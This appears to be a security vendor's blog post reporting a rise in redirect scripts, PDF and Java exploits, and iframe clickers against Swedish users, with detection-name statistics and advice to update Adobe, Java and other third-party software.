Web based threats such as malicious links on social medias, infected websites and malicious ads are terms that we read about quite often. We security experts have for quite some time tried to emphasize the importance of protecting both your website and computer from being infected, since these malicious websites often exploit client vulnerabilities. These vulnerabilities have been one of the major attack vectors for malware writers in recent years, but is it still a problem?
We are constantly seeing new software vulnerabilities , and the bad guys are very quick to developg exploits which are then hosted in their exploit kits. The vulnerabilities themselves are not dangerous unless the attacker is able to exploit them on the victim’s computer. The attackers have therefor developed ways to get victims to visit a website, for example, which then triggers the exploit. Some common ways are through social engineering or infecting a legitimate website with redirection code that points to the exploit kit.
Last month almost all major vendors released critical security updates for their software, such as Adobe, Oracle, Apple, Microsoft and Mozilla. I then started to research the current threat landscape, and focused on Sweden since I am the security researcher for the Nordic region; and after just a few minutes I saw that both Swedish websites and Swedish users were under attack.
In September we saw a 3700% increase in JavaScript-based redirection scripts, specifically Trojan.JS.Redirector.ro. This malicious redirector went from 908th place to 15th place in the list of the most detected malware in Sweden in one month. This code only redirects users to another URL, and I thought it was strange that we did not really see an increase of detected malware in September?
What we are experiencing in Sweden now is a large mass infection. In October I saw that a lot of PDF vulnerabilities being exploited. For example, Exploit.JS.Pdfka.evi increased by over 500% and Exploit.JS.Pdfka.ext by 188%. I also saw a big increase in Iframe Clickers and an increase of over 300% for Trojan-Clicker.HTML.Iframe.kr. All of this was a pretty good indication that something is going on in Sweden at the moment, but I still felt that I was missing something. So when looking deeper I also started to see that even new versions of exploits were being detected. Just in October we have identified over seven new variants of exploits attacking Swedish users. It’s also interesting that Java exploits are much more exploited than PDF exploits. The new exploits are:
- Exploit.Java.CVE-2010-0840.dj
- Exploit.JS.Pdfka.ezg
- Exploit.Java.CVE-2010-0840.dc
- Exploit.Java.CVE-2010-0840.do
- Exploit.Java-CVE-2010-0840.df
- Exploit.Java-CVE-2010-0840.dn
- Exploit.Java-CVE-2010-0840.dd
All-in-all, it seems clear that we’re seeing a major attack going on in Sweden at the moment. Of course, we’ll keep you informed of new developments. I also would like everyone to make sure that you dont just use Windows Update for security updates, but that you also update third party applications such as Adobe, Java and clients.
UPDATE: It seems that the mass infection i wrote about was the “after shock” from the major mass infection of ASP.NET sites we wrote about some time ago. Read full article about the infection here.
When analyzing the statistics we are still seeing an increase in Java exploits, and trying to see if there might be any connection to the old infection, or if we are seeing something new.
Sweden is under attack – mass infection and new exploits!